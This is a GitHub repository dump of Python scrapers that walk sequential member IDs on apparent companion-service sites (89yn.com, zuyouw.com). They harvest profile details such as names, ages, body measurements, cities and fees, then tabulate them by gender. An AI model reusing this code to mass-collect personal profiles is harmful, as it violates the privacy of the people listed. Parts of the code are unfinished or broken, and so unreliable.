2018-06-20T12:37:53
2018-06-20T12:37:53
135,167,523
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7615411281585693, "alphanum_fraction": 0.7788962125778198, "avg_line_length": 30.326086044311523, "blob_id": "e17014d74eebacfb2faf8cbf0e1ada278ad7f2e6", "content_id": "99d66fef11caaf5878590996d191aa8a64f982d0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4817, "license_type": "permissive", "max_line_length": 132, "num_lines": 92, "path": "/README.md", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "# datas\n爬取某些网站数据,并且做可视化处理。\n\n## 前提条件\n使用该爬虫,需要满足以下条件:\n* 安装python3环境,推荐3.5\n* 安装Pycharm Community(可选) \n\n### Python安装\nWindows: \n请到[Python3.5 Download Page](https://www.python.org/downloads/release/python-350/)下载,下载完成后,双击进行安装。全部选项默认即可。 \n然后设置系统环境变量,将安装的Python路径加到`$PATH`环境变量即可,参看[Windows 设置 Python环境变量](https://jingyan.baidu.com/article/48206aeafdcf2a216ad6b316.html)。 \n\nLinux(Ubuntu为例):\n```bash\nsudo apt install python3.5\n``` \n\nMac OS:\n```bash\nbrew install python3\n``` \n\n### Pycharm Community安装\n进入[Pycharm Community Download](https://www.jetbrains.com/pycharm/)下载,默认安装即可。\n\n## 使用\n首先需要下载本仓库代码,有以下两种方式:\n* 到项目主页下载ZIP压缩文件,推荐不熟悉Git的用户\n* 使用Git克隆,命令如下\n\n```bash\ncd $YOUR_WORK_DIR\ngit clone https://github.com/luozhouyang/datas\n```\n下载后解压(如果是下载ZIP压缩文件),然后使用你喜欢的文本编辑器或者IDE打开项目即可。推荐Pycharm Community。\n\n然后按照Pycharm的提示安装依赖库。 \n\n该代码主要有以下几个步骤:\n* 下载html页面(保存数据源,不是很必要)\n* 解析html文件,提取有效信息,保存为CSV文件\n* 进一步处理CSV文件,提取出想要的数据,输出到EXCEL表格\n* 将感兴趣的内容,绘制图表\n\n进一步,你可以使用EXCEL进一步将输出的数据进行可视化。\n\n### HTML页面的下载\n网站一般会有反爬虫策略,常用的办法是控制访问的频率,同时使用多个IP。为了简单,本项目没有使用IP池,只是控制了访问频率。 \n下载HTML页面的代码位于[bajiuwang/html_downloader.py](bajiuwang/html_downloader.py)。\n本爬虫目前只支持`url+$ID`形式的网站页面下载,当然要想支持其他类型的URL很简单。 \n举个例子,如果某网站的地址规律是`http://www.555.com?id=$ID`这种形式,那么本项目适合你,只需要给在Downloader的__init__函数里面,给`base_url`参数设置为`http://www.55.com?id=`。 \n为了避免不必要的网络访问,你需要确定一个合理的`$ID`范围。在Downloader的__init__函数的`ranges`参数设置好即可。 \n\n准备好之后,即可运行`html_downloader.py`程序,下载程序启动后,会定期保存当前的`$ID`值,当程序异常退出的时候,下次启动程序,会从该`$ID`开始继续下载,即类似断点功能。\n记录该`$ID`的文件在程序当前目录,名为的`record.txt`文件。 \n下载的HTML页面默认保存在本项目的根目录下的文件夹,具体目录你可以自己设置。\n\n### HTML页面的解析\n下载好数据之后,即可启动解析程序,提取出你想要的信息。按照[bajiuwang/patterns.py](bajiuwang/patterns.py)的格式添加需要解析的内容。 \n运行[bajiuwang/html_parser.py](bajiuwang/html_parser.py)文件,即可开始解析。 \n如果你设置了其他的下载目录,在改文件的`file`一行改成你自定义的目录即可。 \n本步骤生成的CSV文件位于前一步骤的相同目录,文件名为`0_info.csv`,你可以在`html_parser.py`文件中自行更改文件名。 \n\n### 根据CSV文件进行可视化 \n根据前面步骤生成的CSV文件,可以进一步可视化。使用`matplotlib`和`PrettyTable`两个库进行图的绘制和表格的输出。 \n\n要生成图表,只需要运行[bajiuwang/csv_analyzer.py](bajiuwang/csv_analyzer.py)文件即可。\n生成的图片保存在当前目录的`images`文件夹内。输出的表,直接打印在终端。 \n\n同时也会将数据输出到EXCEL表格文件,保存在当前目录下的`datas.xlsx`文件,方便用户处理。\n\n### 使用EXCEL处理输出文件 \n上一个步骤输出的`datas.xlsx`文件,使用强大的Microsoft Excel软件打开,可以用来制作各种类型的图表。\n\n## matlibplot中文显示的问题 \n参考 [matlibplot显示中文](https://monkey0105.github.io/2016/10/10/matplotlib-chinese-display/) \n\n## License\n Copyright 2018 luozhouyang.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License." 
}, { "alpha_fraction": 0.5089853405952454, "alphanum_fraction": 0.5255736708641052, "avg_line_length": 38.315216064453125, "blob_id": "9c98a01d830b42bc9fbe0b0d4a881362cbb72a66", "content_id": "5394f134d868f1331784ee8583947d81a6ca67f6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3617, "license_type": "permissive", "max_line_length": 116, "num_lines": 92, "path": "/bajiuwang/html_downloader.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import time\nimport argparse\nimport os\n\nfrom urllib import request\n\n\nclass Downloader:\n\n def __init__(self, base_url, record_file, save_folder, ranges):\n cur_path = os.path.dirname(__file__)\n self.record_file = record_file\n if not self.record_file:\n self.record_file = os.path.join(cur_path, \"record.txt\")\n self.save_folder = save_folder\n if not save_folder:\n self.save_folder = os.path.join(cur_path, \"download\")\n if not base_url:\n raise TypeError(\"base url is NoneType\")\n self.base_url = base_url\n if ranges and len(ranges) == 2:\n self.start_id = int(ranges[0])\n self.end_id = int(ranges[1])\n else:\n self.start_id = 700000\n self.end_id = 800000\n\n def download(self):\n start_id = self._read_start_id()\n print(\"Start id: %d\" % start_id)\n success_count = 0\n prev_err_id = start_id\n continuous_err_count = 0\n for id in range(start_id, self.end_id):\n try:\n time.sleep(1)\n resp = request.urlopen(self.base_url + str(id), timeout=2.0)\n if resp.getcode() != 200:\n continue\n page = resp.read().decode('gbk')\n if not os.path.exists(self.save_folder):\n os.makedirs(self.save_folder)\n file = self.save_folder + \"/\" + str(id) + '.txt'\n with open(file, mode='wt', encoding='utf-8', buffering=8192) as f:\n f.write(page)\n except Exception as e:\n print(\"Exception occurs in %d\" % id)\n if id == prev_err_id + 1:\n continuous_err_count += 1\n else:\n continuous_err_count = 0\n if continuous_err_count == 50:\n print(\"Continuous error count: %d\" % continuous_err_count)\n # print(\"Stop program\")\n # break\n time.sleep(60 * 60)\n self.download()\n prev_err_id = id\n continue\n else:\n print(str(id))\n success_count += 1\n if success_count % 100 == 0:\n self._save_start_id(str(id))\n\n def _read_start_id(self):\n id = self.start_id\n if not os.path.exists(self.record_file):\n return id\n with open(self.record_file, mode=\"rt\", encoding=\"utf8\") as fin:\n id = fin.readline()\n if id:\n id = int(id)\n return id\n\n def _save_start_id(self, id):\n with open(self.record_file, mode=\"wt\", encoding=\"utf8\") as fout:\n fout.write(id)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--base_url\", type=str, default=\"http://www.89yn.com/member.asp?id=\")\n parser.add_argument(\"--record_file\", type=str, default=\"/home/allen/PycharmProjects/datas/bajiuwang/record.txt\",\n help=\"A file to save latest download id.\")\n parser.add_argument(\"--save_folder\", type=str, default=\"/home/allen/PycharmProjects/datas/www89yn_data\",\n help=\"A folder to save download files.\")\n parser.add_argument(\"--range\", type=str, default=\"700000,800000\", help=\"Comma-separated list of ids.\")\n args, _ = parser.parse_known_args()\n downloader = Downloader(base_url=args.base_url, record_file=args.record_file, save_folder=args.save_folder,\n ranges=args.range.split(\",\"))\n downloader.download()\n" }, { "alpha_fraction": 0.7311828136444092, "alphanum_fraction": 0.7580645084381104, "avg_line_length": 45.75, 
"blob_id": "7e351c96dcddb02f3f55e7240ce17581adbe6075", "content_id": "a9708eb898d52cea4095ba2e55fff2e593a3e92b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 186, "license_type": "permissive", "max_line_length": 70, "num_lines": 4, "path": "/bajiuwang/html_downloader.sh", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\npython3 html_downloader.py \\\n --save_folder=/home/allen/PycharmProjects/datas/www89yn_data \\\n --record_file=/home/allen/PycharmProjects/datas/www89yn/record.txt" }, { "alpha_fraction": 0.524210512638092, "alphanum_fraction": 0.5799999833106995, "avg_line_length": 31.758621215820312, "blob_id": "e5bffca0b7ec9f20dde68e54d0e06fba344b49e2", "content_id": "1161ed275b0da79c3d3b4845baf212ebc8ea8a44", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 950, "license_type": "permissive", "max_line_length": 125, "num_lines": 29, "path": "/zuyouw/zuyouw_html_download.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import time\nfrom urllib import request\n\nheaders = {\n 'Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0',\n 'Accept': 'text/html',\n 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36',\n 'DNT': '1',\n}\nfor id in range(162315, 167900):\n try:\n time.sleep(1)\n url = 'http://www.zuyouw.com/home/' + str(id)\n print(url)\n req = request.Request(url=url, headers=headers)\n resp = request.urlopen(req, timeout=2.0)\n if resp.getcode() != 200:\n continue\n page = resp.read().decode('utf-8')\n file = '/home/allen/PycharmProjects/datas/zuyouw_data/' + str(id) + '.html'\n with open(file, mode='wt', encoding='utf-8', buffering=8192) as f:\n f.write(page)\n except Exception as e:\n print(e)\n continue\n else:\n print(str(id))\n" }, { "alpha_fraction": 0.5127528309822083, "alphanum_fraction": 0.5341542363166809, "avg_line_length": 34.9052619934082, "blob_id": "5ed0cf203fed853b5b5d4e25de6d5057537c78bb", "content_id": "d874594176226aa15daa4871232fbbd31d469917", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3419, "license_type": "permissive", "max_line_length": 106, "num_lines": 95, "path": "/bajiuwang/csv_xlsx_saver.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "from openpyxl import Workbook\nimport os\n\n\nclass XLSXSaver:\n\n def __init__(self, filename, ages, services, educations, origins, cities):\n self.filename = os.path.join(os.path.dirname(__file__), \"xlsx\", filename)\n self.ages_all_dict = ages[0]\n self.ages_men_dict = ages[1]\n self.ages_women_dict = ages[2]\n self.services_all_dict = services[0]\n self.services_men_dict = services[1]\n self.services_women_dict = services[2]\n self.edus_all_dict = educations[0]\n self.edus_men_dict = educations[1]\n self.edus_women_dict = educations[2]\n self.origins_all_dict = origins[0]\n self.origins_men_dict = origins[1]\n self.origins_women_dict = origins[2]\n self.cities_all_dict = cities[0]\n self.cities_men_dict = cities[1]\n self.cities_women_dict = cities[2]\n\n @staticmethod\n def _save_xlsx_horizontal(wb, title, index, c0, c1, c2):\n sheet = wb.create_sheet(title=title, index=index)\n row = ['']\n men_row = ['男']\n women_row = ['女']\n for k, _ in c0.items():\n row.append(k)\n if k in c1.keys():\n v0 = 
int(c1[k])\n else:\n v0 = 0\n men_row.append(v0)\n if k in c2.keys():\n v1 = int(c2[k])\n else:\n v1 = 0\n women_row.append(v1)\n sheet.append(row)\n sheet.append(men_row)\n sheet.append(women_row)\n\n @staticmethod\n def _save_xlsx_vertical(wb, title, index, c0, c1, c2):\n sheet = wb.create_sheet(title, index)\n row = ['', '男', '女']\n sheet.append(row)\n for k, _ in c0.items():\n if k in c1.keys():\n v_men = int(c1[k])\n else:\n v_men = 0\n if k in c2.keys():\n v_women = int(c2[k])\n else:\n v_women = 0\n row = [k, v_men, v_women]\n sheet.append(row)\n\n def _save_xlsx(self, wb, title, index, c0, c1, c2):\n self._save_xlsx_horizontal(wb, title + \"_1\", index, c0, c1, c2)\n self._save_xlsx_vertical(wb, title + \"_2\", index + 5, c0, c1, c2)\n\n def _save_age_xlsx(self, wb):\n self._save_xlsx(wb, title='age', index=0,\n c0=self.ages_all_dict, c1=self.ages_men_dict, c2=self.ages_women_dict)\n\n def _save_service_type_xlsx(self, wb):\n self._save_xlsx(wb, title='service_type', index=1,\n c0=self.services_all_dict, c1=self.services_men_dict, c2=self.services_women_dict)\n\n def _save_edu_xlsx(self, wb):\n self._save_xlsx(wb, title='education', index=2,\n c0=self.edus_all_dict, c1=self.edus_men_dict, c2=self.edus_women_dict)\n\n def _save_origin_xlsx(self, wb):\n self._save_xlsx(wb, title='origin', index=3,\n c0=self.origins_all_dict, c1=self.origins_men_dict, c2=self.origins_women_dict)\n\n def _save_lives_xlsx(self, wb):\n self._save_xlsx(wb, title='lives_in', index=4,\n c0=self.cities_all_dict, c1=self.cities_men_dict, c2=self.cities_women_dict)\n\n def save_to_xlsx(self):\n wb = Workbook()\n self._save_age_xlsx(wb)\n self._save_service_type_xlsx(wb)\n self._save_edu_xlsx(wb)\n self._save_origin_xlsx(wb)\n self._save_lives_xlsx(wb)\n wb.save(self.filename)\n" }, { "alpha_fraction": 0.4817112982273102, "alphanum_fraction": 0.49118223786354065, "avg_line_length": 34.195404052734375, "blob_id": "0f4e8f83b75cdc7ac01e517c960531830d820c4f", "content_id": "afc0fc89d91477f7d9b2f390be60cd824bb798e4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3296, "license_type": "permissive", "max_line_length": 109, "num_lines": 87, "path": "/zuyouw/zuyouw_html_parser.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import os\n\nheadline = \"身  份,用 户 名,用户 ID,性  别,婚姻状态,年  龄,学  历,身  高,月薪收入,星  座,职  业,所在地区,自我介绍,\" \\\n \"个性描述,相貌自评,体  重,体  型,魅力部位,发  型,发  色,脸  型,租友类型,方便联系时间,\" \\\n \"提供的线上服务,收  费,提供的线下租友服务,收  费\"\n\n\nclass Item:\n\n def __init__(self, identify, name, id, gender, marriage, age, education, height, incoming, constellation,\n occupational, area, charecter, look, weight, charm, hair, hair_color, face, rent_type,\n time, service_online, pay_online, service_offline, pay_offline, self_intro=\"\"):\n self.identify = identify\n self.name = name\n self.id = id\n self.gender = gender\n self.marriage = marriage\n self.age = age\n self.education = education\n self.height = height\n self.incoming = incoming\n self.constellation = constellation\n self.occupational = occupational\n self.area = area\n self.charecter = charecter\n self.look = look\n self.weight = weight\n self.charm = charm\n self.hair = hair\n self.hair_color = hair_color\n self.face = face\n self.rent_type = rent_type\n self.time = time\n self.service_online = service_online\n self.pay_online = pay_online\n self.service_offline = service_offline\n self.pay_offline = pay_offline\n self.intro = self_intro\n\n def to_csv_line(self):\n return 
self.identify+\",\"\n\n\nfiledir = \"/home/allen/PycharmProjects/datas/zuyouw_data/\"\nfiles = os.listdir(filedir)\nfor f in files:\n if not f.endswith(\".html\"):\n continue\n with open(filedir + f, mode=\"rt\", encoding=\"utf-8\", buffering=8192) as fin:\n item = Item()\n while True:\n position = 0\n line = fin.readline()\n if not line:\n break\n if \"infolist\" in line:\n if position == 0:\n def parse(line):\n line = line.split(\":\")[1]\n return line[:line.index(\"<\")]\n\n\n position += 1\n lines = []\n for _ in range(12):\n lines.append(fin.readline())\n item.identify = parse(lines[0])\n item.name = parse(lines[1])\n item.id = parse(lines[2])\n item.gender = parse(lines[3])\n item.marriage = parse(lines[4])\n item.age = parse(lines[5])\n item.education = parse(lines[6])\n item.height = parse(lines[7])\n item.incoming = parse(lines[8])\n item.constellation = parse(lines[9])\n item.occupational = parse(lines[10])\n item.area = parse(lines[11])\n continue\n elif position == 1:\n position += 1\n continue\n elif position == 2:\n position += 1\n continue\n else:\n pass\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6625000238418579, "avg_line_length": 27, "blob_id": "28a715162c556bd876f8b10f924d7ff1f9e72e01", "content_id": "aa3cc793a0fb4fb01a662f3df0cb606c7c7c1e98", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 560, "license_type": "permissive", "max_line_length": 125, "num_lines": 20, "path": "/zuyouw/zuyou77.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import bs4\nfrom urllib import request\n\nheaders = {\n 'Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0',\n 'Accept': 'text/html',\n 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36',\n 'DNT': '1',\n}\nurl = \"http://wxapp.zuyou77.com/web\"\nreq = request.Request(url=url, headers=headers)\nresp = request.urlopen(req, timeout=2)\nhtml = resp.read().decode('utf8')\nprint(html)\nbs = bs4.BeautifulSoup(html)\n\nfor e in bs.div:\n print(e)\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.7661290168762207, "avg_line_length": 30, "blob_id": "6f10e3e1f97845250a0231d33784baaa8c0a4ead", "content_id": "30fce9d5ac4a494cad623e5899a34fa8e66c31f5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 124, "license_type": "permissive", "max_line_length": 76, "num_lines": 4, "path": "/install_requirements.sh", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nsource venv2/bin/activate\n\npip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple -r requirements.txt\n" }, { "alpha_fraction": 0.5560046434402466, "alphanum_fraction": 0.5560046434402466, "avg_line_length": 45.81081008911133, "blob_id": "2b238607e147f1cf974a918d18fb58a7af6c50b5", "content_id": "77304a4e62273770336f8994d50368423d768a18", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1732, "license_type": "permissive", "max_line_length": 103, "num_lines": 37, "path": "/bajiuwang/item.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "class Item:\n\n def __init__(self, name=\"\", id=\"\", gender=\"\", age=\"\", birth=\"\", constellation=\"\",\n height=\"\", weight=\"\", size=\"\", degree=\"\", marriage=\"\", occupational=\"\",\n lives=\"\", origin=\"\", 
area=\"\", payment=\"\", serve_time=\"\", language=\"\",\n serve_type=\"\", hobbits=\"\", characteristic=\"\", message=\"\"):\n self.name = name\n self.id = id\n self.gender = gender\n self.age = age\n self.birth = birth\n self.constellation = constellation\n self.height = height\n self.weight = weight\n self.size = size\n self.degree = degree\n self.marriage = marriage\n self.occupational = occupational\n self.lives = lives\n self.origin = origin\n self.area = area\n self.payment = payment\n self.serve_time = serve_time\n self.language = language\n self.serve_type = serve_type\n self.hobbits = hobbits\n self.character = characteristic\n self.message = message\n\n def __str__(self):\n return \"name={},id={},gender={},age={},birth={},constellation={},height={},weight={},\" \\\n \"size={},degree={},marriage={},occupational={},lives={},origin={},area={},payment={},\" \\\n \"serve_time={},language={},serve_type={},hobbits={},characteristic={},message={}\" \\\n .format(self.name, self.id, self.gender, self.age, self.birth, self.constellation,\n self.height, self.weight, self.size, self.degree, self.marriage, self.occupational,\n self.lives, self.origin, self.area, self.payment, self.serve_time, self.language,\n self.serve_type, self.hobbits, self.character, self.message)\n" }, { "alpha_fraction": 0.6007533073425293, "alphanum_fraction": 0.6059321761131287, "avg_line_length": 38.70093536376953, "blob_id": "22163b5de43fcbba892c9cd278a42cff51c1a82a", "content_id": "6f779a540efb7f69f74cb88e7694cbc2a0f4aed8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4248, "license_type": "permissive", "max_line_length": 118, "num_lines": 107, "path": "/bajiuwang/csv_table_printer.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "from prettytable import PrettyTable\n\n\nclass TablePrinter:\n\n def __init__(self, ages, services, educations, origins, cities):\n self.ages_all_dict = ages[0]\n self.ages_men_dict = ages[1]\n self.ages_women_dict = ages[2]\n self.services_all_dict = services[0]\n self.services_men_dict = services[1]\n self.services_women_dict = services[2]\n self.edus_all_dict = educations[0]\n self.edus_men_dict = educations[1]\n self.edus_women_dict = educations[2]\n self.origins_all_dict = origins[0]\n self.origins_men_dict = origins[1]\n self.origins_women_dict = origins[2]\n self.cities_all_dict = cities[0]\n self.cities_men_dict = cities[1]\n self.cities_women_dict = cities[2]\n\n @staticmethod\n def _total_value(values):\n total = 0\n for v in values:\n total += int(v)\n return total\n\n def print_age(self):\n self._print_table([\"Age\", \"Count\", \"Percent\"], \"Age distribution table\", self.ages_all_dict)\n\n def print_age_men(self):\n self._print_table([\"Age\", \"Count\", \"Percent\"], \"Male age distribution table\", self.ages_men_dict)\n\n def print_age_women(self):\n self._print_table([\"Age\", \"Count\", \"Percent\"], \"Female age distribution table\", self.ages_women_dict)\n\n def _print_table(self, columns, header, collection):\n print(\"=====\" + header)\n table = PrettyTable(columns)\n table.align[columns[0]] = \"l\"\n table.padding_width = 1\n total = self._total_value(collection.values())\n for k, v in collection.items():\n p = \"%.2f\" % (int(v) / total * 100)\n table.add_row([k, v, p])\n print(table)\n print(\"Total: %d\" % total)\n\n def print_service_types(self):\n self._print_table([\"Type\", \"Count\", \"Percent\"], \"Service types distribution table\", 
self.services_all_dict)\n\n def print_service_types_men(self):\n self._print_table([\"Type\", \"Count\", \"Percent\"], \"Male service types distribution table\",\n self.services_men_dict)\n\n def print_service_types_women(self):\n self._print_table([\"Type\", \"Count\", \"Percent\"], \"Female service types distribution table\",\n self.services_women_dict)\n\n def print_edu(self):\n self._print_table(columns=[\"Education\", \"Count\", \"Percent\"], header=\"Education distribution table\",\n collection=self.edus_all_dict)\n\n def print_edu_men(self):\n self._print_table(columns=[\"Education\", \"Count\", \"Percent\"], header=\"Male education distribution table\",\n collection=self.edus_men_dict)\n\n def print_edu_women(self):\n self._print_table(columns=[\"Education\", \"Count\", \"Percent\"], header=\"Female education distribution table\",\n collection=self.edus_women_dict)\n\n def print_origin(self):\n self._print_table([\"Origin\", \"Count\", \"Percent\"], \"Origin distribution table\", self.origins_all_dict)\n\n def print_origin_men(self):\n self._print_table([\"Origin\", \"Count\", \"Percent\"], \"Male origin distribution table\", self.origins_men_dict)\n\n def print_origin_women(self):\n self._print_table([\"Origin\", \"Count\", \"Percent\"], \"Female origin distribution table\", self.origins_women_dict)\n\n def print_cities(self):\n self._print_table([\"City\", \"Count\", \"Percent\"], \"Cities distribution table\", self.cities_all_dict)\n\n def print_cities_men(self):\n self._print_table([\"City\", \"Count\", \"Percent\"], \"Male cities distribution table\", self.cities_men_dict)\n\n def print_cities_women(self):\n self._print_table([\"City\", \"Count\", \"Percent\"], \"Female cities distribution table\", self.cities_women_dict)\n\n def print_tables(self):\n self.print_age()\n self.print_age_men()\n self.print_age_women()\n self.print_service_types()\n self.print_service_types_men()\n self.print_service_types_women()\n self.print_edu()\n self.print_edu_men()\n self.print_edu_women()\n self.print_origin()\n self.print_origin_men()\n self.print_origin_women()\n self.print_cities()\n self.print_cities_men()\n self.print_cities_women()\n" }, { "alpha_fraction": 0.507164478302002, "alphanum_fraction": 0.5140262246131897, "avg_line_length": 38.959678649902344, "blob_id": "83e2cf83226bee52237864db666cf44961d8cbab", "content_id": "c69c4638b28d90c3938b0741385a7dedf690a4ef", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5077, "license_type": "permissive", "max_line_length": 116, "num_lines": 124, "path": "/bajiuwang/html_parser.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import os\n\nfrom bajiuwang.patterns import Patterns\nfrom bajiuwang.item import Item\n\nfiles = os.listdir(\"/home/allen/PycharmProjects/datas/www89yn_data\")\ninfos = []\n\n\ndef _parse_line(line, type=1):\n contents = line.split(\":\")\n if len(contents) != 2:\n return \"\"\n if type == 1:\n result = Patterns.PATTERN_TYPE_1.sub(\"\", contents[1])\n return result.replace(\",\", \";\").replace(\"\\s+\", \" \").strip()\n elif type == 2:\n result = Patterns.PATTERN_TYPE_ID.sub(\"\", contents[1])\n return result.replace(\",\", \";\").replace(\"\\s+\", \" \").strip()\n elif type == 3:\n result = Patterns.PATTERN_TYPE_PAYMENT.sub(\"\", contents[1])\n return result.replace(\",\", \";\").replace(\"\\s+\", \" \").strip()\n return \"\"\n\n\nfor f in files:\n if not f.endswith(\".txt\"):\n continue\n p = 
\"/home/allen/PycharmProjects/datas/www89yn_data/\" + f\n if not os.path.exists(p):\n continue\n with open(p, mode=\"rt\", encoding=\"utf-8\") as fin:\n item = Item()\n for l in fin:\n if not l.strip():\n continue\n if Patterns.PATTERN_NAME.findall(l):\n item.name = _parse_line(l)\n continue\n if Patterns.PATTERN_ID.findall(l):\n item.id = _parse_line(l, type=2)\n continue\n if Patterns.PATTERN_GENDER.findall(l):\n item.gender = _parse_line(l)\n continue\n if Patterns.PATTERN_AGE.findall(l):\n item.age = _parse_line(l)\n continue\n if Patterns.PATTERN_BIRTH.findall(l):\n item.birth = _parse_line(l)\n continue\n if Patterns.PATTERN_CONSTELLATION.findall(l):\n item.constellation = _parse_line(l)\n continue\n if Patterns.PATTERN_HEIGHT.findall(l):\n item.height = _parse_line(l)\n continue\n if Patterns.PATTERN_WEIGHT.findall(l):\n item.weight = _parse_line(l)\n continue\n if Patterns.PATTERN_SIZE.findall(l):\n item.size = _parse_line(l)\n continue\n if Patterns.PATTERN_DEGREE.findall(l):\n item.degree = _parse_line(l)\n continue\n if Patterns.PATTERN_MARRIAGE.findall(l):\n item.marriage = _parse_line(l)\n continue\n if Patterns.PATTERN_OCCUPATIONAL.findall(l):\n item.occupational = _parse_line(l)\n continue\n if Patterns.PATTERN_LIVES.findall(l):\n item.lives = _parse_line(l)\n continue\n if Patterns.PATTERN_ORIGIN.findall(l):\n item.origin = _parse_line(l)\n continue\n if Patterns.PATTERN_AREA.findall(l):\n item.area = _parse_line(l)\n continue\n if Patterns.PATTERN_PAYMENT.findall(l):\n item.payment = _parse_line(l, type=3)\n continue\n if Patterns.PATTERN_SERVE_TIME.findall(l):\n item.serve_time = _parse_line(l)\n continue\n if Patterns.PATTERN_LANGUAGE.findall(l):\n item.language = _parse_line(l)\n continue\n if Patterns.PATTERN_SERVICE_TYPE_PROVIDED.findall(l) or Patterns.PATTERN_SERVICE_TYPE_NEEDED.findall(l):\n item.serve_type = _parse_line(l)\n continue\n if Patterns.PATTERN_HOBBITS.findall(l):\n item.hobbits = _parse_line(l)\n continue\n if Patterns.PATTERN_CHARACTERISTIC.findall(l):\n item.character = _parse_line(l)\n continue\n if Patterns.PATTERN_MESSAGE.findall(l):\n item.message = _parse_line(l)\n continue\n if item.id:\n # print(count)\n infos.append(item)\noutdir = \"/home/allen/PycharmProjects/datas/www89yn_data/\"\nif not os.path.exists(outdir):\n os.mkdir(outdir)\noutfile = outdir + '0_info_20180609.csv'\nwith open(outfile, mode=\"wt\", encoding=\"utf-8\", buffering=8192) as f:\n f.write(\"姓名, Id, 性别, 年龄, 生日, 星座, 身高, 体重, 体型, 学位, 婚姻,\" +\n \"职业, 居住城市, 籍贯, 可去地区, 是否收费, 服务时间, 使用语种, 提供服务,\" +\n \"兴趣爱好, 性格类型, 心情留言\\n\")\n count = 0\n for item in infos:\n count += 1\n print(count)\n line = item.name + \",\" + item.id + \",\" + item.gender + \",\" + item.age + \",\" + item.birth + \",\" + \\\n item.constellation + \",\" + item.height + \",\" + item.weight + \",\" + item.size + \",\" + \\\n item.degree + \",\" + item.marriage + \",\" + item.occupational + \",\" + item.lives + \",\" + \\\n item.origin + \",\" + item.area + \",\" + item.payment + \",\" + item.serve_time + \",\" + \\\n item.language + \",\" + item.serve_type + \",\" + item.hobbits + \",\" + item.character + \",\" + \\\n item.message + \"\\n\"\n f.write(line)\n" }, { "alpha_fraction": 0.5893805027008057, "alphanum_fraction": 0.5936577916145325, "avg_line_length": 40.5950927734375, "blob_id": "b789c3078fcf47e316f9f638c97b1a23fedf918f", "content_id": "c7623f640008585a9f546033f4657f6a03b59fea", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6810, 
"license_type": "permissive", "max_line_length": 104, "num_lines": 163, "path": "/bajiuwang/csv_analyzer.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import csv\nfrom collections import Counter, OrderedDict\n\nimport jieba\n\nfrom .csv_image_generator import ImageGenerator\nfrom .csv_table_printer import TablePrinter\nfrom .csv_xlsx_saver import XLSXSaver\n\njieba.load_userdict(\"/home/allen/PycharmProjects/datas/jieba_dict.txt\")\n\n\nclass Analyzer:\n\n def __init__(self, csv_file):\n self.csv_file = csv_file\n self.has_parse_file = False\n self.ages_dict = None\n self.ages_men_dict = None\n self.ages_women_dict = None\n self.genders_dict = None\n self.educations_dict = None\n self.educations_men_dict = None\n self.educations_women_dict = None\n self.service_types_dict = None\n self.service_types_men_dict = None\n self.service_types_women_dict = None\n self.origin_dict = None\n self.origin_men_dict = None\n self.origin_women_dict = None\n self.lives_dict = None\n self.lives_men_dict = None\n self.lives_women_dict = None\n\n def parse_csv_file(self):\n ages = []\n ages_men = []\n ages_women = []\n genders = []\n educations = []\n educations_men = []\n educations_women = []\n origins = []\n origins_men = []\n origins_women = []\n service_types = []\n service_types_men = []\n service_types_women = []\n lives = []\n lives_men = []\n lives_women = []\n\n def callback(row):\n age = str(row[3].replace('岁', ''))\n gender = row[2].strip()\n education = row[9].strip()\n 